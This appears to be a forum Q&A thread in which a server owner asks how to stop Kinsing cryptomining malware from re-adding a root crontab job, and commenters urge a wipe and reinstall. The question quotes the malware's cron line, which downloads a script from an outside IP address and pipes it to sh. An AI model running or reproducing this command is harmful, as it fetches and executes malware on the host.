# Cannot stop Kinsing malware from creating cronjob

Tags: 18.04

So basically my fresh server has been infected with the cryptomining malware Kinsing. Despite me following all of the instructions [here](https://stackoverflow.com/questions/59487096/kdevtmpfsi-how-to-find-and-delete-that-miner) I still can't seem to stop the malware from creating this line in my root crontab:

```
* * * * * wget -q -O - http://195.3.146.118/sc.sh | sh > /dev/null 2>&1
```

This is infact infecting my Scrapyd daemon with a malicious project and `r01.egg` file.

At the moment no active processes are spawning and there doesn't seem to be activity from the malware. This is probably because I have locked down the files with restricted permissions as indicated by the resource linked before.

How can I stop the cronjob to start? It seems to be generated at least twice a day, maybe even more.

Thank you,

Comment: Wipe and reinstall, there's no point cleaning a compromised system.

Comment: Being a cryptomining malware it doesn't "compromise" my system since I managed to block its activity. There has to be some script somewhere that is generating that cronjob, but I have no clue how to find it.

Comment: That you can't find the script that's modifying your system on the fly is proof you don't know the extent of the damage. It could be something else disguised as Kinsing, it could be Kinsing delivered through another payload delivery mechanism. The not knowing is why the consensus regarding compromised machines is nuke and reinstall.

Comment: Given this is a fresh server, stop trying to save it and nuke it, [here](https://serverfault.com/questions/218005/)'s the canonical question on Server Fault for this kind of situation.

Comment: Many thanks. Still hope to find a way to fix this though. If you have any tips I'll be happy to hear them.

Comment: While tracking down how it got in is important to not make the same mistakes, I cannot state importantly enough how you should not assume your system is sane once you've cleaned up. At this point, further comments would turn to chat so I'm leaving it at that.

Comment: if it's in your root crontab, you have a pwned system. either you were running web services with vulnerabilities that allowed root escalation, or you had a weak ssh password allowing sudo. either way, if they have root, there are many ways they can hide their activity, and also likely have continued access to the system via backdoors, or via the original vulnerability. they have root, so the machine is no longer yours, you should wipe and reinstall after determining method of entry, so that you don't suffer the same fate again.

Comment: Thank you. I will wipe the system asap.

Answer (score 2):

Step1 Get PID and Kill Them

```
ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi
```

Step2 Delete Files

```
rm -f /tmp/kdevtmfsi
```

Comment: That is not enough. Delete cronjobs too that are creating it.

Comment: ran through this delete process several times.  miner reappears after a short time as if it has a generation script hidden elsewhere on the host.

Comment: https://www.linkedin.com/pulse/kinsing-malware-permanent-solution-amul-patel/